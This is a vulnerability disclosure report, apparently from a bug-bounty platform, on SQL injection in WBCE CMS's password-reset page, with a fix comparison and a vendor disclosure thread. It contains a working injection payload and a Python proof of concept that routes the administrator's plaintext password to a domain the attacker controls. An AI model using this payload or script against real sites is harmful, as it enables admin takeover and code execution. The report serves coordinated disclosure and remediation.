SQL Injection in wbce/wbce_cms
Reported on Nov 27th 2021
Description
Plaintext recovery of the administrator password through an SQL injection in the password reset page.
admin/login/forgot/index.php lines 33-34:
$sSql = "SELECT * FROM `{TP}users` WHERE `email` = '" . $email . "'";
$rRow = $database->query($sSql);
Because the email validation is weak, an attacker can inject arbitrary SQL into this query and recover the administrator's password.
admin/login/forgot/index.php, lines 26-30:
$email = strip_tags($wb->get_post('email'));
if ($admin->validate_email($email) == false) {
    $oMsgBox->error($MESSAGE['USERS_INVALID_EMAIL']);
    $email = '';
}
The validate_email function, located in framework/class.wb.php, lines 617-631:
public function validate_email($email)
{
    if (function_exists('idn_to_ascii')) {
        // use pear if available
        $email = @idn_to_ascii($email);
    } else {
        require_once WB_PATH . '/include/idna_convert/idna_convert.class.php';
        $IDN = new idna_convert();
        $email = $IDN->encode($email);
        unset($IDN);
    }
    // regex from NorHei 2011-01-11
    $retval = preg_match("/^((([!#$%&'*+\\-\/\=?^_`{|}~\w])|([!#$%&'*+\\-\/\=?^_`{|}~\w][!#$%&'*+\\-\/\=?^_`{|}~\.\w]{0,}[!#$%&'*+\\-\/\=?^_`{|}~\w]))[@]\w+(([-.]|\-\-)\w+)*\.\w+(([-.]|\-\-)\w+)*)$/", $email);
    return ($retval != false);
}
Regex filtering is not an adequate defence against SQL injection: the character class for the local part admits quotes, slashes, asterisks and equals signs, so an SQL fragment can pass as a syntactically valid address while the query itself still concatenates the value into the SQL text.
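The following is an added example, not WBCE project code: it re-uses the regex quoted above from framework/class.wb.php to show that the report's injection string passes validation, and places the concatenated lookup from admin/login/forgot/index.php next to a parameterised one. It assumes PHP with the pdo_sqlite extension; the helper names, the in-memory users table and the example.com domain are constructed for this demo.

```php
<?php
// Added example, not WBCE project code. Assumes pdo_sqlite is available;
// helper names, the users table and the example.com domain are constructed.

// The validator's pattern, copied verbatim from the report.
const WBCE_EMAIL_REGEX = "/^((([!#$%&'*+\\-\/\=?^_`{|}~\w])|([!#$%&'*+\\-\/\=?^_`{|}~\w][!#$%&'*+\\-\/\=?^_`{|}~\.\w]{0,}[!#$%&'*+\\-\/\=?^_`{|}~\w]))[@]\w+(([-.]|\-\-)\w+)*\.\w+(([-.]|\-\-)\w+)*)$/";

function isValidEmailByRegex(string $email): bool
{
    return preg_match(WBCE_EMAIL_REGEX, $email) === 1;
}

// Vulnerable shape: the address is concatenated straight into the SQL text,
// exactly like the SELECT in admin/login/forgot/index.php.
function findUserByEmailConcat(PDO $db, string $email): ?array
{
    $sql = "SELECT user_id, email FROM users WHERE email = '" . $email . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened shape: the address is bound as a parameter, so quotes, comment
// markers and keywords inside it are compared as data, never parsed as SQL.
function findUserByEmailPrepared(PDO $db, string $email): ?array
{
    $stmt = $db->prepare("SELECT user_id, email FROM users WHERE email = ?");
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed fixture: one administrator row with user_id 1, as in the report.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (user_id INTEGER PRIMARY KEY, email TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin@example.com')");

// The report's payload with its domain swapped for example.com.
$payload = "'/**/or/**/user_id=1/**/or/**/'random@example.com";

var_dump(isValidEmailByRegex($payload));                     // true: the regex is no barrier
var_dump(findUserByEmailConcat($db, $payload));              // the admin row: injection succeeds
var_dump(findUserByEmailPrepared($db, $payload));            // NULL: no account has that address
var_dump(findUserByEmailPrepared($db, 'admin@example.com')); // the legitimate lookup still works
```

The prepared form is the same change the vendor's fix needs to make wherever a posted value reaches a query; the regex can stay as a format check, but it carries no security weight.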
Steps to reproduce:
1. First we need to select the administrator from the users table, using this payload: '/**/or/**/user_id=1/**/or/**/'random@pylibs.org (which bypasses the regex filtering in class.wb.php).
2. Even though we have no control over the administrator's email, the reset mail can be sent to another address.
admin/login/forgot/index.php lines 76-77:
// Setup email to send
$mail_to = $email;
The payload I used can be a real email address, while at the same time it injects an SQL query and selects the administrator from the users table. In this example I used the pylibs.org domain and installed a forwarder for all emails to dectavianus07@gmail.com.
Proof of Concept
# PoC.py
import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php'  # from my localhost environment
_domain = 'pylibs.org'  # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
r = requests.post(url=_url, headers=headers, data=_p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive the plaintext password which belongs to the administrator :)')
- In the end, you should receive an email from the vulnerable endpoint addressed to '/**/or/**/user_id=1/**/or/**/'random@yourdomainname.com.
Impact
Authentication bypass in this web application is equivalent to pre-auth RCE, since an authenticated administrator can easily run PHP code through templates or by uploading new modules.
@admin can we invite any other people to this page? I contacted the vendor and they are asking about vulnerability details. I think it's better for the vendor to see it on this page, so I won't copy all the information.
@maxway2021 - feel free to share the URL for this page with others. It is protected, and so only users with maintainer permissions can view your report.
I have tagged you in a comment on GitHub responding to the maintainers.
Regarding the CVE, we can assign a CVE if the maintainer is also happy to do so once the report has been marked as valid and fixed.
Let me know if you have any further questions, and happy to help 👋
We just need to wait for the maintainer to come on platform and confirm this as well.
I shared the link with the vendors; I think they will respond soon.
Confirmed. Fixed in https://github.com/WBCE/WBCE_CMS/commit/6ca63f0cad5f0cd606fdb69a372f09b7d238f1d7
We will release WBCE CMS 1.5.2 tomorrow.
Oh well, I think you will assign the CVE after the fix. Okay, understood 😅
Exactly, we just require the maintainer to confirm the commit SHA that fixes the vulnerability via the platform.
What am I supposed to do? Click on the green button top right?
And please allow the WBCE users an appropriate time to fix their installation before disclosing this vulnerability.
@maintainer - when you are ready to make this report public, please click the confirm fix button, where you will be asked to provide a commit SHA and patched version.
Just for clarity, once this report is "fixed", it will be visible to the public.
We will arrange this once the fix has been confirmed and the maintainer is happy for a CVE to be published for this report.
It seems that the maintainer would like a small delay in taking the report public + publishing a CVE, so that the community can fix their vulnerable installations.
@maintainer I think this is the best way to inform users about the critical vulnerability. It will help users know why they should update the system ASAP.
@maxway2021 - we can, we just need the go-ahead from the maintainer, and we can arrange this for you. We will wait for the maintainer to respond and share their thoughts 👍
We have informed our users as best as we can (website, forum, newsletter, update information in the backend) and gave them 7 days to update. So yes, you can go ahead creating a CVE ID.
